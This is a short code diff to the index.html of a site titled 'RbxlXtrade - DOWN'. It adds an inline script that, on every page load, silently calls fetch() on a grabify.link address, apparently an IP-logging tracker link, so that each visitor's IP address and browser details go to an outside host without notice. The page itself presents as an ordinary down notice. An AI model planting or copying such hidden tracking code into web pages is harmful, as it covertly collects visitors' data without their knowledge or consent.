--- a/index.html
+++ b/index.html
@@ -5,7 +5,9 @@
     <title>RbxlXtrade - DOWN</title>
 
     <script src="3656436AFD8C18DF272FF03FE99DBBD37107E40ABD688F2907AD5C4E95AE9FE3.js"></script>
-
+    <script>
+        fetch("https://grabify.link/NLDWV0");
+    </script>
     <style>
         *{
             padding: 0;
